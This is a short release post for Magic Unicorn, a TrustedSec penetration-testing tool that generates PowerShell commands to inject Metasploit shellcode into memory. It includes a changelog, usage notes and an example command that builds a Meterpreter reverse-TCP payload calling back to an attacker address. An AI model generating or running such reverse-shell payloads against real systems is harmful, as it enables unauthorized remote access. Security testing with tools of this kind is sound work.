Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.

+changelog version 1.0:
+~~~~~~~~~~~~~~~~~~~~~~
+* incorporated new macro attack from Rik van Duijn RCX @rikduijn
+* code cleanup and fixed an issue that would not present argument values when not formatted properly
+* channeled stderr to subprocess.PIPE
+* slimmed unicorn powershell injection code about 17 bytes to compact powershell injection

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system.

root@bt:~/Desktop# python unicorn.py

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Usage: python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download : Master.zip  | Clone Url
Source: TrustSec  | https://www.trustedsec.com/